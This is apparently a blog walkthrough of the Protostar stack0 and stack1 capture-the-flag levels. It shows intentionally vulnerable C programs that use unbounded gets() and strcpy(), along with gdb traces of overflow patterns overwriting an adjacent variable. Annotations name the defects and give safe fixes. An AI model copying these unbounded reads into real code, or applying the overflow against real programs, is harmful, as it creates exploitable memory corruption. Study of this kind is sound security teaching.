Protostar

Stack Buffer Overflows — Protostar | stack0 and stack1

What is a stack buffer overflow? How do you perform a stack overflow?

What is Protostar?

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

/*
 * Protostar stack0: the challenge program that the gdb trace below examines.
 *
 * Reads one line from stdin into a 64-byte stack buffer with gets() and then
 * reports whether the neighbouring `modified` variable is still zero.
 *
 * Defect (the exercise's subject): gets() takes no length, so any line longer
 * than 63 bytes plus the terminator writes past the end of `buffer`. gets()
 * was deprecated in C99 and removed from the language in C11.
 * The gdb listing on this page reads `modified` from [esp+0x5c] (esp+92).
 * In the first x/24wx dump the word at esp is 0xbffff75c, which looks like
 * the argument passed to gets(), i.e. &buffer; 0xbffff75c + 64 = 0xbffff79c
 * = esp+0x5c, so `modified` would sit immediately after the buffer at the
 * next higher address (inferred from the dump — confirm with
 * `p &buffer` / `p &modified` in gdb).
 *
 * Fix (defender's version, not applied here so the listing still matches the
 * trace): bound the read with `fgets(buffer, sizeof buffer, stdin);`, which
 * can never write beyond the 64 bytes, and build with -fstack-protector so a
 * frame overwrite is detected instead of silently changing control/data.
 *
 * Notes: `volatile` forces the compiler to re-read `modified` after gets();
 * without it the comparison could be folded to the constant 0 assigned
 * above. argc/argv are unused. main has no explicit return; in C99+ falling
 * off the end of main is equivalent to `return 0;`.
 */
int main(int argc, char **argv)
{
volatile int modified;   /* the value the trace watches at [esp+0x5c] */
char buffer[64];         /* fixed-size target of the unbounded gets() below */

modified = 0;
gets(buffer);            /* unbounded read from stdin: the overflow point */

if(modified != 0) {
printf("you have changed the 'modified' variable\n");
} else {
printf("Try again?\n");
}
}
gdb stack0
0x08048411 <main+29>:   mov    eax,DWORD PTR [esp+0x5c]
0x08048415 <main+33>: test eax,eax
0x08048417 <main+35>: je 0x8048427 <main+51>
break *0x08048411
break *0x08048415
define hook-stop
i registers
x/24wx $esp
x/2i $eip
end
0xbffff740:  0xbffff75c  0x00000001  0xb7fff8f8  0xb7f0186e
0xbffff750: 0xb7fd7ff4 0xb7ec6165 0xbffff768 0x61616161
0xbffff760: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffff770: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffff780: 0x61616161 0x61616161 0x08006161 0xbffff7a8
0xbffff790: 0xb7ec6365 0xb7ff1040 0x0804845b 0x00000000
esp = bffff740
0x5c = 92 (in decimal)
$esp + 92 = the address of our value
0xbffff740 + 0x5c = 0xbffff79c
0xbffff790: 0xb7ec6365 0xb7ff1040 0x0804845b 0x00000000
0xbffff740: 0xbffff75c 0x00000001 0xb7fff8f8 0xb7f0186e
0xbffff750: 0xb7fd7ff4 0xb7ec6165 0xbffff768 0x61616161
0xbffff760: 0x61616161 0x62626262 0x62626262 0x63636363
0xbffff770: 0x63636363 0x64646464 0x64646464 0x65656565
0xbffff780: 0x65656565 0x66666666 0x66666666 0x67676767
0xbffff790: 0x67676767 0x68686868 0x68686868 0x00000000
0xbffff740: 0xbffff75c 0x00000001 0xb7fff8f8 0xb7f0186e
0xbffff750: 0xb7fd7ff4 0xb7ec6165 0xbffff768 0x61616161
0xbffff760: 0x61616161 0x62626262 0x62626262 0x63636363
0xbffff770: 0x63636363 0x64646464 0x64646464 0x65656565
0xbffff780: 0x65656565 0x66666666 0x66666666 0x67676767
0xbffff790: 0x67676767 0x68686868 0x68686868 0x00004141
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

/*
 * Protostar stack1: the challenge program that the gdb trace below examines.
 *
 * Copies argv[1] into a 64-byte stack buffer with strcpy() and then checks
 * whether the neighbouring `modified` variable now equals 0x61626364 (a
 * 32-bit value made of the ASCII codes of 'a', 'b', 'c', 'd'; 0x61 = 'a' as
 * the trace notes).
 *
 * Defect (the exercise's subject): strcpy() copies up to the NUL terminator
 * of argv[1] with no bound, so an argument longer than 63 bytes writes past
 * the end of `buffer`. The dump on this page shows the 0x61 pattern in the
 * rows around 0xbffff740 but does not show where `modified` lands for this
 * binary, so its offset is not documented here.
 *
 * Fix (defender's version, not applied here so the listing still matches the
 * trace): reject or bound over-long input before copying, e.g.
 *   if (strlen(argv[1]) >= sizeof buffer) errx(1, "argument too long");
 *   snprintf(buffer, sizeof buffer, "%s", argv[1]);
 * (snprintf always NUL-terminates the destination; strncpy would not).
 *
 * Other review notes on this listing:
 *  - errx() is declared in <err.h>, which is not included here; the call is
 *    therefore an implicit declaration (a warning on older compilers, an
 *    error on recent GCC/Clang).
 *  - errx() appends its own newline, so the "\n" inside the message prints
 *    an extra blank line.
 *  - "%08x" expects an unsigned int but `modified` is int; pass
 *    (unsigned)modified to match the conversion exactly.
 *  - main has no explicit return; in C99+ falling off the end of main is
 *    equivalent to `return 0;`.
 */
int main(int argc, char **argv)
{
volatile int modified;   /* compared against 0x61626364 after the copy */
char buffer[64];         /* fixed-size destination of the unbounded strcpy() */

if(argc == 1) {
errx(1, "please specify an argument\n");   /* exits with status 1 */
}

modified = 0;
strcpy(buffer, argv[1]);   /* unbounded copy of untrusted argv[1]: the overflow point */

if(modified == 0x61626364) {
printf("you have correctly got the variable to the right value\n");
} else {
printf("Try again, you got 0x%08x\n", modified);
}
}
break *0x080484a7
b *0x080484ab
eip says I am on <main+67>
I can see the 'a' (0x61) pattern again
0xbffff720: 0xbffff73c 0xbffff972 0xb7fff8f8 0xb7f0186e
0xbffff730: 0xb7fd7ff4 0xb7ec6165 0xbffff748 0x61616161
0xbffff740: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffff750: 0xb7ff0061 0x080496fc 0xbffff788 0x08048509
0xbffff760: 0xb7fd8304 0xb7fd7ff4 0x080484f0 0xbffff788
0xbffff770: 0xb7ec6365 0xb7ff1040 0x080484fb 0x00000000
/* Excerpt repeated from the stack1 listing above: the success branch.
 * 0x61626364 is the 32-bit value whose bytes are the ASCII codes of
 * 'a', 'b', 'c', 'd' (0x61 = 'a', as the trace notes). */
if(modified == 0x61626364) {
printf("you have correctly got the variable to the right value\n");
}

Connecting the dots, and the rest is magic. https://ayedaemon.github.io/